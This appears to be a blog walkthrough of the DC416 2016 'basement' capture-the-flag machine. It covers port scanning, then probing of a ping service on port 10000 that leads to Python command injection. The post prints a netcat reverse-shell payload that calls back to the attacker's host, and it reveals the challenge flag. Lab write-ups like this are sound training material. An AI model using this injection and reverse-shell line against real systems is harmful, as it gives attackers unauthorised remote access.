Tuesday 24 January 2017

DC146:2016 basement challenge

Hello,

Today I would like to present dc416-2016-basement challenge walkthrough.

Nmap port scanning.

Looking for our target, we discovered that the machine has assigned 192.168.253.30 IP address.

Now, let's try check what kind of services serves our target.










OK, nmap scanning has discovered 4 open ports. We can see that the target uses port 8080 as a HTTP Proxy. Hmmm, interesting.

Let's begin our penetration test from 80 HTTP port.














I run DirBuster, but it doesn't find anything interesting and useful... So let's check what is hosted on port 10000.








Hmmm, maybe we should try play with it via netcat?






Probably on port 10000 is something like a ping -c [number of packets] 127.0.0.1.

Maybe we will be able to inject some command to obtain reverse shell.
Do to that, we have to import os.system, so let's do that!





Very good, we executed id command on victim's OS.

We are able to obtain reverse shell using __import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')







Excellent! We have got limited shell.
jack@basement:~$ ls
ls
flag.txt  ping.py  run_ping.sh
jack@basement:~$ cat flag.txt
cat flag.txt
flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}
Good :)